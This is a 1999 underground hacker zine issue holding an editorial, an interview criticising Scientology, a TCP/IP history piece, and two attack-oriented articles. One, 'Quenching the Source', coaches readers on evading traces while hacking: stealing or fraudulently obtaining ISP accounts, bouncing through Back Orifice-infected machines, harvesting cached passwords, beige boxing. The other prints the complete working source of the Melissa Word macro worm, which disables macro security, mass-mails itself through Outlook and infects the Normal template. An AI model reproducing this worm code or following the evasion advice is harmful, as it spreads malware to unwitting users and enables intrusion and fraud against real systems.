:The Discordant Opposition Journal:
:Number #5:
:May 99, Sixth Release, http://www.Rue-the-Day.net/discordia:

  Chained on the burning lake; nor ever thence
  had risen or heaved his head, but that the will
  and high permission of all ruling heaven.
  Left him at large with his own dark designs,
  that with reiterated crimes might heap
  on himself DAMNATION !
                                        -John Milton

_____________
-= [DoJ Related Stuff] =-

! PLEASE READ THE EDITORIAL !

the head punk            : Rue-the-Day      root@rue-the-day.net
gothic coordinator       : cronus           cronus@iol.ie
assistant head crusher   : Digital Avatar   apparitione@gmx.de
in-house thug #1         : Kleptic          kleptic@grex.org
in-house thug #2         : RELM             relm6@hotmail.com

articles, rants and editorial email to : discordia@Rue-the-Day.net
DoJ distribution site                  : http://www.Rue-the-Day.net/discordia
inspirational reading                  : 'Use of Weapons' by Iain M. Banks

This issue is dedicated to the following; Garry Garcia, Elvis, Sid Vicious and Jimmy Hoffa. All great discordians in their time.

:We'd like to thank ethercat for her continued support with the DoJ:
:Submissions of the usual mix of informative articles, graphics for the:
:gallery, logs, saucy humour, quotes and whatever are GREATLY appreciated:
:Erotic submissions ? We're still waiting...:

------------------------
The Discordant Opposition Journal Number 5, May 1999. All Rights Reserved. Nothing may be reproduced in whole or part without written permission from the editors. The DoJ is made public at irregular periods, but don't worry you won't miss us.
----------------------------------------------------
-=[ DoJ Number 05 ]=-
----------------------------------------------------

File:
[01] editorial [behind the scenes]............the editors
[02] quenching the source.....................cronus
[03] interview with ethercat..................editors
[04] a look at the melissa virus..............relm
[05] protocols and such.......................digital avatar
[06] the ancient art of port surfing..........cronus
[07] biometrics...............................infinity matrix
[08] the chernobyl virus......................relm
[09] dr klep speaks...........................kleptic
[10] conclusion [wrapping it all up]..........the editors
----------------------------------------------------

:Editorial: "Behind the scenes..."

The DoJ is an irregularly released Underground Zine. The DoJ covers every aspect of Underground culture, from Virii to Hacking and from Drugs to Fiction. This editorial is going to give an insight into the world of the DoJ and an intimate look behind the scenes.

The DoJ Editors are glad to announce the introduction of a new member. RELM joins us as an in-house writer. He and Kleptic will be featured with regular sections. We'll get round to interviewing RELM before too long.

As you all know we have some semi-regular features in the DoJ. We try to include an interview with some member of the Underground each issue; this week ethercat is interviewed. ethercat offered us space to host the DoJ site when no one else would. She definitely goes down in Discordian History as a class hacker chick.

Both the editors knew Kleptic from a long time ago. He was a part-time hacker and part-time trouble maker. Of course he'd dispute that... So when we were starting the DoJ we talked with Kleptic and asked if he'd like to be involved.

We really didn't know Digital Avatar much, but extremely quickly he showed huge amounts of interest in helping and was quickly offered the Assistant Editor position.
Digital started by writing but his role in the DoJ has shifted more toward advertisement and getting the word out.

We have had drought periods so far. The flow of articles has always been slower than we thought it would be. We know we have a large coverage by the mail we get and also talking to people online. But despite that, people seem reluctant to write.

We have always pushed the DoJ to be a more Underground zine rather than a technical hacking or phreaking zine. And to that end, we publish articles on dozens of Underground topics. Nothing is unspoken...

If you've enjoyed reading any of the past issues of the DoJ or you agree with our ideal but don't think we've followed through properly, then you have an obligation to help. Helping can be anything from submitting articles, submitting art for our gallery or just general advertising. This isn't us working for you like with regular print publications. This is a Zine, this is the wider Us making a living breathing publication. You are all as much a part of the DoJ as we the staff are. Just give that some thought...

The Editors

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 2 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Quenching the Source:
cronus

Any hacker who has ever hacked anything more impressive than his Linux partition will tell you that the most important part of hacking is hiding your own location. It is so essential to hide your location that it becomes instinctive for hackers. I shall discuss some techniques, both new and old, of hiding your real location.

ISP

The most important part of your hacking sequence is going to be your net account. If you are traced back to your ISP, then their logs will be able to tell the victim who you are, where you live and what you eat for breakfast. You can avoid being traced back to your own account by hacking someone else's net account and using that.
Some Internet Providers allow you to set up a Guest account so you can test their services. If you can't hack another account on an ISP, then you should try to get your hands on a Guest account to hack from. It is necessary that you don't hack from your own account so that you aren't traced to your name and address. Getting a Guest account should be easy enough. Contact an ISP and ask about their services. Then ask if you can have a Guest account to see if it compares to the others. You will need to give false information to the ISP so that you are safe.

Bounce

After all this, you are still possibly being traced to your city and general location. So next you want to hide your geographical location, as well as your net location. There are several ways to hide your physical location.

First is a practice that has essentially vanished from the mainstream. Wingate is a software package that allows many computers to connect to the internet through a single internet connection. A hole in the Wingate system was found that allowed people to bounce their connection from the Wingate machine. Wingating can be used to 'bounce' your data packets off another system, to hide your IP address.

Back Orifice is a trojan hacking program that allows people to take control of certain functions on infected computers. The 'redirect' option allows for IP redirects to be set up. A redirect is set up on an infected computer. Any packets that are sent to the redirect port on the infected machine will be bounced to the new destination without being logged. This is a very anonymous way of bouncing a connection. And several infected computers can be strung together to add greater protection. Also the 'system password' option in Back Orifice allows people to view any cached passwords on the infected system. This can often render ISP passwords, letting you attack from a false account.

Also many companies over the net offer free shell accounts and these are perfect ways to hide your IP address.
You connect to the shell account and do your hacking from there and so hide where you are coming from. Again you will need to give false information for that too so that you are totally safe.

Phone

You may want to take the added precaution of hacking from a different phone line. By this I mean with a laptop at a pay phone or even in an Internet cafe. Preferably one that allows you some privacy. You can connect a laptop to the side of a pay phone or even the side of a house. This is called beige boxing and is used widely by phreaks.

Next is out-dials. These are diminishing fast, because of their use by hackers, but some universities still run them for their students. An out-dial is a computer that is set up to let you dial out over its modem to another computer. These can be used to call another system and from there you can hack away. This means that the trace can only go as far as the out-dial, and it would then slow down any trace a lot as anyone tries to move the trace to the university line. If the University is logging the connection then they will have your IP address. But if you are spoofing your IP address or if you are using another net account that isn't yours then this isn't a problem.

Spoofing

IP spoofing is an extremely complex and difficult technique used by hackers to hide their IP address. I can and will only skim the surface of spoofing, giving you enough information so that you can go and search for more information on your own. If you have root access on a UNIX machine, then you can write a program to hide your IP address in data packets. By creating custom made packets you can choose what information to include, so you can obscure your connection address. IP spoofing takes a huge amount of skill as you must adhere to known Internet standards. My site at http://homepages.iol.ie/~cronus has some excellent files on IP spoofing.

Systems

As a hacker's repertoire of hacked computers grows, it can be very useful to route your connection through them.
The more connections you have and the more often you rearrange the stops, the less likely you are to be traced to your originating connection. The more connections you can make between you and the victim, the better you have hidden your location, your identity and your freedom.

All this may seem like basic ideas that you would have used anyway. But you'd be surprised at how many elite hackers have been arrested because they got too big headed and neglected to use any protection.

Also remember that you should change the route you take each time. This is so that over a few different hacking sessions you aren't slowly traced section by section. If you change the route often then you will make each trace a brand new one.

... intoxicated with the madness ...

cronus (at) iol (dot) ie
http://homepages.iol.ie/~cronus

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 3 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Interview with Ethercat:
The Editors

Ethercat is one of the founding fathers/mothers of the DoJ, giving us space to host the site when no one else would. We had a discussion with her just recently on the topic of the Scientologists and those that picket them;

DoJ: How did the picketing go ?

It went great. We had 5 people there, and we did it for an hour. And we all got our pictures taken by the cult photographer.

DoJ: Of course you should stand for what you believe in, but
DoJ: equally you should never shun anyone who has Co$ beliefs
DoJ: simply because they have their own beliefs. Everyone is
DoJ: entitled to their opinion.
DoJ: [ BTW I am just being devil's advocate... for the sake of
DoJ: discussion...]

I am glad you said that, and I don't mind discussing it.
I appreciate that you want to keep an objective point of view, and that you want to allow everyone the freedom to believe in any religious beliefs that they choose. I also appreciate that you want to know more about the organization, which is what I protest. I'm glad you're looking at both sides with skepticism. I did too, at first.

Your readers who are unfamiliar with scientology may want to visit Xenuphobe's excellent overview of scientology:
http://members.tripod.com/~bwarr/

Believe me, and I will show you, it is not about religious beliefs. It is about actions taken by the Church of Scientology organization as a whole, which are unethical in the best of cases, and criminal in many cases. I think most individual scientologists have good intentions, but are deluded. The problem is that the policies and teachings of scientology, written by L.Ron Hubbard, are, at the core, sinister and driven by paranoia and greed. They are actions which hardly befit a church, especially a tax-exempt one.

I should also point out that Dianetics, referred to as "Hubbard Tech" by scientologists, is presented as a form of self-help (however questionable) with the purpose of funnelling people into Co$, while not revealing that it claims to be a religion, a sort of "bait and switch" tactic.

DoJ: I do disagree with what the Co$ people do. They target youths
DoJ: and vulnerable people. Pulling people off the street that fit a
DoJ: certain 'profile' of vulnerable targets.

But simply targeting youths and vulnerable people to be drawn into their religion is far from all that the Church of Scientology (Co$) does.

They harass people with intimidation, lawsuits, private investigators, and threats to uninvolved other people (friends, relatives, business associates), etc. in an attempt to prevent damaging information from being exposed.

They attempt to stifle forums of free speech where people meet and discuss their experiences with scientology.
Free and relatively anonymous communication on the internet threatens the Co$, and they in turn threaten the newsgroup alt.religion.scientology, and have made several attempts to close it down with massive DoS attacks. If your readers are interested in maintaining free exchange of information, they may want to look into some of this further.
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,224578,00.html
http://www.modemac.com/Co$/Co$2.html
http://www2.thecia.net/users/rnewman/scientology/home.html

They tie up the legal system with frivolous lawsuits, purely for harassment purposes, as recommended in Hubbard's writings as a way to "handle" critics. It is the very filing of such frivolous cases which makes other, more important cases take so long to make it into the courts. (Think about how long Kevin Mitnick waited in jail for a closing to his recent case; civil cases often go on much longer, sometimes with as much stress and more financial hardship to the defendant, as their lives hang in the balance.)

They picket the residences of critics, trying to give back what they get, but picketing a residence is illegal in most of the US, while picketing a commercial property is not.

They spread vicious innuendo against critics in their neighborhoods and in Co$ publications. This slanderous technique is referred to in Hubbard documents as "Dead Agenting", attempting to make critics appear disreputable and destroy their credibility so no one will listen to their criticisms.

They run front organizations, designed to falsely enhance public opinion of scientology or funnel new members into the Church of Scientology, some of which make no mention of the use of scientology teachings. Some are management courses which a scientologist employer requires employees take as a condition of working there, which then indoctrinates the employees into scientology.
They have numerous branches with different names providing various services to the main scientology organization, which make it difficult to track the flow of money from one to another. Some examples of these are RTC, the Religious Technology Center, which handles distribution of books, tapes, products, and courses; Bridge Publications, which does the printing of Co$ publications; Golden Era Studios, where commercials, tapes, and videos are made for Co$, and numerous others.

They achieved tax exempt status through a secret deal with the IRS, agreeing to drop litigation against the IRS and stop harassment of individual IRS employees in exchange. So all their lawsuits and activities and income are tax exempt; however, their tax-exempt status is up for a final evaluation this year, and it's not too late for concerned Americans to write to their congressmen urging an investigation into the matter.

They encourage an "us against them" attitude in their members toward anyone who is not a scientologist, and teach that if anyone so much as questions the words or absolute authority of L. Ron Hubbard, it is because they have crimes they wish to conceal. People who speak out critically are labeled "Suppressive Persons" or SPs, and any action which a scientologist feels he must take to protect Co$ is considered ethical by scientology and Hubbard's writings.

Scientology has as its goal "clearing the planet". "Clearing" is a process that involves taking numerous classes from Co$, and undergoing "auditing", a pseudo-psychotherapy practiced by "specialists" recognized only by the Co$. This is done at great expense to the person being cleared. Those who cannot be cleared (as defined by Hubbard) or who will not be cleared should "be disposed of quietly and without sorrow". Did I mention that you must be a scientologist in order to be considered cleared?

They do all of this, based on directives written into L. Ron Hubbard's administrative policies, directives written by Hubbard himself to silence critics and prevent would-be-ex-members from leaving the organization and talking, because they might say too much. Rather than address people's concerns with answers, they follow Hubbard's teaching, "Never defend. Always attack."
http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/philosop.htm

You can read who may be attacked, and how they may be "handled" (what may be done to them) in Hubbard's own words from 1959; his "Manual of Justice" is located at:
http://www.innernet.net/joecisar/ars1007.htm

Does a religion have a right to dispense justice, or should that be reserved for the justice system in the country involved? And do these words sound like the words of a religious man?

Scientology uses language to its own ends. Great emphasis is placed on properly defining words, which sounds good until you realize that the dictionaries which scientologists use to look up misunderstood words are Hubbard-written dictionaries. The importance of specialized language to a group, with a focus on scientology, is examined in Richmann's essay called "Language, Jargon and Mind Control", originally posted to the newsgroup alt.religion.scientology, and archived at:
http://www.users.wineasy.se/noname/jargon.htm

Hubbard's and his followers' ideas of justice vary greatly from what you and I think of as justice. For instance, several people have died mysteriously, after expressing a desire to leave the "church", and people who were there at the time have now come forth and told what happened. Many of them, unless they laid low and kept silent, have been framed for crimes they didn't commit, or brought into legal battles with this "church"; and generally harassed to make their life a living hell.

Some examples:

Paulette Cooper - "Operation Freakout"
Wrote a book about Co$, The Scandal of Scientology, then was arrested for sending bomb threats to them.
Documents confiscated during an investigation and raid of another scientology "operation", Operation Snow White, were found to include instructions on how to frame Paulette Cooper. Her court deposition is here:
http://wpxx02.toxi.uni-wuerzburg.de/~krasel/Co$/cooper/

"Operation Snow White" was an infiltration of government offices around the world by scientologists, for the purpose of illegally removing documents considered harmful to the Co$. One person recently posted that their friend, a scientologist, justifies Operation Snow White by saying "the government was going to remove the documents anyway, we were just helping them".
http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/ops/go732/go732.htm

Lisa McPherson - A member of Co$
A scientologist working for a Co$ publishing company, making upwards of $100,000 a year and donating much of it back to the church (in 1994 it was $75,275 for services, and another $55,000 as a donation), died under mysterious circumstances, after telling friends she wanted to leave Co$, and telling paramedics at the scene of an accident, "I need help. I need to talk to someone," saying she had been doing "wrong things [she] didn't know were wrong." and identifying herself as a Scientologist. Amidst a lot of dodgy statements to the press, the Church of Scientology was indicted in her death. This is still playing out in the courts as I write. Read more about it here on Jeff Jacobsen's Lisa Memorial Page:
http://www.primenet.com/~cultxpt/lisa.htm
And read the indictment here:
http://www.kcii.com/~dallara/indictment2.html

Other critics have their computers seized, internet and web hosting accounts closed down by ISPs who haven't the resources to determine whether complaints are valid, and would rather not go head to head with Co$; some have found dead animals at their doorstep; the examples seem endless. I will summarize some URLs for your readers at the bottom.

DoJ: Back to the picketing... Does it really make much of a
DoJ: difference ?
Yes, it does, in several ways. It lets the surrounding public know who the organization is, and gives us an opportunity to tell them some of the things Co$ usually tries to hush up. In addition to the general public, the people we talk to sometimes include potential members, and sometimes their own members, who will not get all the facts from Co$. Some members who are on the net have installed Co$ web filtering software to keep them from reading anything critical of scientology. It's similar to Cybersitter, and jokingly referred to as ScienoSitter or ScienoNanny, and I'm proud to say that my name is on the "banned words" list. Here's some info about the filtering software.
http://www.xs4all.nl/~johanw/Co$/nanny.html

A fringe benefit is that it allows us to meet other local critics in person, which is nice, since much of the discussion is done online.

The other way picketing helps is more complicated: It scares the cult into acting stupidly, in accordance with L.Ron Hubbard's vicious teachings, and that behavior also informs more people about their tactics. They don't know how to deal with people who won't be silenced by intimidation. They must act accordingly with L.Ron Hubbard's teachings (specifically) which are outdated and he's dead so he can't revise them to keep up with changing technology. To change Hubbard's writings and church policies is considered "out-tech". Because they've depended on their strongarm tactics to keep people quiet; and because L.Ron's outdated policies don't cover how to deal with picketers, or the internet and people being able to talk to each other and compare notes, they will try to pull some ludicrous stunt that is intended to threaten a single person. In the past, this would have just made the single person look crazy or paranoid to others, and finding nowhere to turn for support, they would have been "shuddered into silence".
But now, with the newsgroup (alt.religion.scientology), IRC (#scientology), mailing lists and private email, people talk, and see the same tactics repeated over and over, and they can and do document and publish these tactics, and figure out how to take their own precautions.

Co$ draws new members from the public, and the more the public knows what Co$ is up to, the fewer potential members there are out there. Picketing gets attention, and then anyone who stops to find out what's up gets pointed to the internet. You would be surprised how many people already know some things about Co$, and want to find out more, then they find out there is so much activism already in progress - it's easier to join a movement than to start one - and they become active too.

In addition, people inside the org see the picket and may wonder what they're not being told. This leads to what is termed "a condition of doubt" by Hubbard, and must be handled by the person's "Ethics Officer". "Conditions of doubt" are often a predecessor to a member "waking up" (as it has been called by ex members) and realizing the truth that Co$ hasn't told them. One scientology org even went so far as to hang a giant tarp between the org and the picketers, to keep the members from seeing the picket, rather than answering questions from members regarding what the picket was about.

A while back, Co$ issued a rmgroup to remove the newsgroup, alt.religion.scientology, and once the net (or you know, those old netizens who have been here forever?) heard about it, people who couldn't have cared less about a cult and their members were now jumping in to defend the net, and their freedom to speak publicly. A lot of hackers got involved in fighting Co$ then, as did admins, the EFF, and other people who heard about it and didn't think it was right.
Now when Co$ tries to hush up harassment and other things they've done, people have a place to discuss it with others, and more people become outraged and begin speaking out themselves. It is jokingly called "Operation Footbullet" on ars.

DoJ: But isn't doing anything more than raising awareness
DoJ: about what Co$ does just propaganda from your side of the
DoJ: field? Don't you think that trying to attract people off the
DoJ: street to come and listen to your own rants and raves about
DoJ: Co$ activity is just as deceptive?

No, I don't think it is deceptive at all. Raising awareness is what we want to do, and then let people who are aware of all the facts draw their own conclusions. We walk around with signs and if people want to stop and talk, they can. We generally provide flyers with pointers to more information if they are interested. We present facts which are well-documented, and which Co$ will NOT present.

DoJ: You talked of people wanting to help fight what Co$ does, but
DoJ: in the same sentence you said how little the public knows
DoJ: about the situation. They can either hear what the Co$ people
DoJ: say and believe that or hear what you and your people say and
DoJ: believe that...

We want them to hear both sides, including that which they will not hear from Co$, and then make up their own minds. We are confident that rational people, armed with the facts, will not join the Co$. They get to hear our side for free, and investigate further for themselves on the internet. To hear Co$' side, in scientology words, "to go up the bridge" (find salvation, reach nirvana, become enlightened, whatever, the top goal in a religion), they have to spend somewhere in the area of $360,000 over a long period of time. That would buy a nice respectable house in a nice neighborhood here, and people take out loans for 30 years for stuff like that. Should finding out about your religion's teachings Co$t as much as a house?
Co$ does not freely publish their religious teachings. The net does. And before anyone begins spending any money with the Co$, I strongly suggest they investigate these religious teachings on the net first.

DoJ: Aren't your tactics potentially worse than theirs? To bring about either the reform or destruction of a cult bent on ruling the world?

No.

*****************************************************************

Here are a few more URLs for readers to check out for themselves:

OPERATION CLAMBAKE:
http://www.xenu.net

BELIEFS:
The Official Church of Scientology Web Site:
http://www.scientology.org
In case you don't find any of the religious beliefs spelled out there, here are a few more sites which are more forthcoming:
http://www.dtek.chalmers.se/~d1dd/Co$/pan27.html
NOTs Scholars Page:
http://w4u.eexi.gr/~antbos/NOTSINDE.HTM
http://www.cs.cmu.edu/People/dst/NOTs/
The Christian View of Scientology:
http://bible.ca/scientology-explained-simple-cri.htm

BOOKS ONLINE:
Martin's Booklist:
http://www.ncf.carleton.ca/~av282/books.htm
http://www.cs.cmu.edu/~dst/Library/hunt-booklist.html

CRIMINAL ACTIONS:
Crime, Deaths, Illegal Activities, and the Courts:
http://mars.superlink.net/user/mgarde/
Deaths At FLAG: Why are these people dead, scientology?
http://home.wxs.nl/~mike_gormez/deaths.html
The Crimes of Scientology:
http://www.ezlink.com/~rayr/doc/
Scientology's Secret Service:
http://wpxx02.toxi.uni-wuerzburg.de/~cowen/go/
The strange links between the Co$-IRS agreement and the Snow White Program:
http://wpxx02.toxi.uni-wuerzburg.de/~cowen/essays/irs-snow.html
The Clearwater Body Count:
http://www.kcii.com/~dallara/bodycount.html
Is Scientology breaking the law?:
http://www.scientology-lies.com/investigation.html

SINISTER POLICIES:
Things To Keep In Mind:
http://www.xenu.net/archive/co$pls.html

Co$ PARANOIA:
Note: this is an official Co$ page.
Co$ believes that a worldwide, organized conspiracy exists which is behind all criticism, and that critics are paid to participate in this "hate campaign".
Behind the Worldwide Campaign:
http://opposing.scientology.org/31-behnd.htm

SCIENTIFIC STUDY:
404 Not found. No published evidence has been found which substantiates the claims of L.Ron Hubbard.

HARASSMENT:
Scientology Pickets Individuals:
http://alley.ethercat.com/pickets/pktsind.htm
Pickets and other harassment by Scientology:
http://alley.ethercat.com/pickets/sp0000.htm

Co$ VS THE NET:
Attack of the Robotic Poets, by Kevin Poulsen:
http://www.zdnet.com/zdtv/cybercrime/chaostheory/story/0,3700,2254578,00.html
The War between Scientology and the Internet:
http://www.gbar.dtu.dk/~c958587/intro/Co$2.html
The Church of Scientology tries to censor Usenet:
http://www2.thecia.net/users/rnewman/scientology/usenet/cancel.html
The Church of Scientology vs. the Net:
http://www2.thecia.net/users/rnewman/scientology/home.html
The Church of Scientology vs. anon.penet.fi:
http://www2.thecia.net/users/rnewman/scientology/anon/penet.html

Co$ FRONT GROUPS:
http://www.snafu.de/~tilman/prolinks/index.html#Co$_business
http://glenn11.home.mindspring.com/truth/front.htm

SCIENTOLOGY-RELATED TERMS:
ARS Acronym/Terminology FAQ v3.5:
http://www.ncf.carleton.ca/~av282/terms.htm

PICKETING:
International Pickets Against Scientology:
http://alley.ethercat.com/pickets/picket.htm
Recent pickets of $cientology offices around the world:
http://207.112.193.9/Panorama.cgi$pickets~Listing
Songs to sing while picketing:
http://extra.newsguy.com/~marina/spsongs/

OPERATION FOOTBULLET:
http://www.xenu.net/archive/footbullet/

NEWSGROUP:
news:alt.religion.scientology

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99
::: The Discordant Opposition Journal ::: Issue 5 - File 4 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:A Look At The Melissa Word Macro Virus:
By RELM

[The Virus]

I'm sure you have heard about the Melissa Virus; most people have. The Microsoft Word virus known as Melissa started spreading Friday, March 26, 1999. This virus spread fast through the internet. In just a couple of days this virus spread worldwide and infected thousands if not millions of computers around the world, faster than any virus to date. This virus spreads when you execute an infected document. If you use Outlook, shipped with Internet Explorer 4.+, as your mail client then the Melissa virus would send itself to the first fifty people in your address book. Now the fifty people in your address book would send the virus to another fifty people, and so on and so on.

[The Job]

The Melissa virus infects MS Word 97 and MS Word 2000 documents and goes about it by adding a new VBA5 module named Melissa. Now before the virus attempts to do a mass mailing it looks for the following registry key in the registry: "HKEY_CURRENT_USER\Software\Microsoft\Office\" with a "Melissa?" value. If the virus finds this "Melissa?" value in the key set to "... by Kwyjibo" it will not attempt another mass mailing, because a mass mailing has already been done on the current machine. If the virus does not find this value in the key then it will attempt a mass mailing. First the virus opens Outlook, then using MAPI calls it uses the user profile set in Outlook. The virus then creates a new E-mail message with the following subject: "Important Message From Joe" (Joe being the user profile). The body of the e-mail says "Here is that document you asked for ...don't show anyone else ;-)". Next the virus creates an attachment to the e-mail, the attachment being the infected Word document. After this is done the sequence is complete and the messages are mailed to the fifty people in the user's address book.

[The Virus Creates Security For Itself]

To create more security the virus deactivates the Tools-Macro menu in MS Word 97, and in MS Word 2000 it deactivates the Macro-Security menu. Now to hide its infection activities the virus disables the Save Normal Template option, the Confirm Conversion at Open option and the Macro Virus Protection option. Doing this means the user is not able to know that there is a macro virus in the document.

[Just For Fun]

Once every hour the virus triggers an action, at a certain minute (a minute that is specified) past the hour corresponding to the date. If you open an infected document at the appropriate minute the virus will insert the following text into the infected document: "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."

[Conclusion]

The base of the Melissa virus is not unusual. The thing that is unusual about the virus is the way it spreads through e-mail and how it travels through the internet in such little time.
By now you should have a clear understanding of the Melissa virus and the way it works. I have tried to outline some important facts about the virus and hopefully give you a better understanding of it. Everything that I have explained in this document can be clearly seen in the source code at the bottom of this text.

[The Code]

This is the Melissa Word Macro Virus code. I trust that you will use this for nothing more than learning.

/--------The Melissa Word Macro Virus Code: Start--------\

Private Sub Document_Open()
On Error Resume Next
' Disable Word's macro security menu/options (Word 2000 branch, then Word 97 branch)
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
    CommandBars("Tools").Controls("Macro").Enabled = False
    Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
' Mass mailing, unless the "Melissa?" registry marker says it has already been done on this machine
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
    If UngaDasOutlook = "Outlook" Then
        DasMapiName.Logon "profile", "password"
        For y = 1 To DasMapiName.AddressLists.Count
            Set AddyBook = DasMapiName.AddressLists(y)
            x = 1
            Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
            For oo = 1 To AddyBook.AddressEntries.Count
                Peep = AddyBook.AddressEntries(x)
                BreakUmOffASlice.Recipients.Add Peep
                x = x + 1
                If x > 50 Then oo = AddyBook.AddressEntries.Count
            Next oo
            BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
            BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
            BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
            BreakUmOffASlice.Send
            Peep = ""
        Next y
        DasMapiName.Logoff
    End If
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
' Infection: copy the module between the active document and the Normal template
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
    If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
    Set ToInfect = ADI1
    ADI1.Name = "Melissa"
    DoAD = True
End If
If NTI1.Name <> "Melissa" Then
    If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
    Set ToInfect = NTI1
    NTI1.Name = "Melissa"
    DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
    Do While ADI1.CodeModule.Lines(1, 1) = ""
        ADI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
    Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
        BGN = BGN + 1
    Loop
End If
If DoAD = True Then
    Do While NTI1.CodeModule.Lines(1, 1) = ""
        NTI1.CodeModule.DeleteLines 1
    Loop
    ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
    Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
        ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
        BGN = BGN + 1
    Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
    ActiveDocument.Saved = True
End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

\--------The Melissa Word Macro Virus Code: End--------/

This concludes the Melissa Word Macro Virus text, written by Relm. Please visit The Fallen Angels webpage at: http://fallenangelz.cjb.net

::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 :::
The Discordant Opposition Journal ::: Issue 5 - File 5 :::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:Protocols and Such:
Digital Avatar

The Internet and all the glorious resources out there would have been out of reach (until a different solution came along) if TCP/IP had not been developed. It is really everything that makes it work. Without it, connecting to other computers would be many, many times more of a task than it is.

Perhaps no organization has more complex networking requirements than the U.S. Department of Defense. Simply enabling communication among the wide variety of computers found in the various services is not enough. DoD computers often need to communicate with contractors and organizations that do defense-related research, such as universities. Defense-related network components must be capable of withstanding considerable damage so that the nation's defenses remain operable during a disaster. TCP/IP enables such communication, regardless of vendor or hardware differences, to occur.

The fact that the DoD initiated research into networking protocols (investigating the technology now known as packet switching) is not surprising. In fact, research on the protocols that eventually became the TCP/IP protocol suite began in 1969. There were several important goals for this research. These goals are the foundation of TCP/IP.

Common Protocols; The DoD required a common set of protocols (communications rules) that could be specified for all networks. Common protocols would greatly simplify the procurement process because the systems could communicate with each other.
Interoperability; If equipment from various vendors could interoperate, system development efficiency could be improved and competition among vendors would be promoted.

Robust Communication; A particularly dependable network standard was required to meet the nation's defense needs. These protocols needed to provide reliable, high-performance networking with the relatively primitive wide area network technologies then available.

Ease of Reconfiguration; Because the DoD depended on the network, it needed to be possible to reconfigure the network and add and remove computers without disrupting communication.

In 1968, the DoD Advanced Research Project Agency (then called DARPA, but since renamed ARPA) initiated research into networks using the technology now called packet switching: the capability to address a packet and move it to the destination through different networks. The first experimental network connected four sites: the University of California at Los Angeles (UCLA), the University of California at Santa Barbara (UCSB), the University of Utah, and SRI International. Early tests were encouraging, and additional sites were connected to the network. The ARPAnet, as it came to be called, incorporated 20 hosts by 1972.

NOTE: You will encounter the terms Internet and internet, and should be aware of an important distinction between them. An internet (short for internetwork) is any network comprised of multiple, interconnected networks, normally within one company (also referred to as an intranet). The Internet is the global internetwork that traces its lineage back to the ARPAnet.

In 1986, groundwork was laid for the commercialization of the ARPAnet. The ARPAnet backbone was dismantled and replaced by a network funded by the National Science Foundation. NSFnet now functions as the Internet backbone. Advanced Network Services (ANS) manages the NSFnet.

The initial set of TCP/IP protocols was developed in the early '80s.
These protocols became the standard protocols for the ARPAnet in 1983. The protocols gained popularity in the user community when TCP/IP was incorporated into version 4.2 of BSD (Berkeley Standard Distribution) UNIX. The BSD version of UNIX is used widely in educational and research institutions. It became the foundation of several commercial UNIX implementations, including Sun's SunOS and Digital's Ultrix. Because BSD UNIX established a relationship between TCP/IP and the UNIX operating system, the vast majority of UNIX implementations now incorporate TCP/IP.

Many different people were involved in the development of the TCP/IP protocol suite, so a way of sharing ideas was needed. A process evolved that enabled everyone to comment on the proposed definitions of the different standards. Basically, someone would draft a standard and the document would be published for review. This became the Request for Comments (RFC) process.

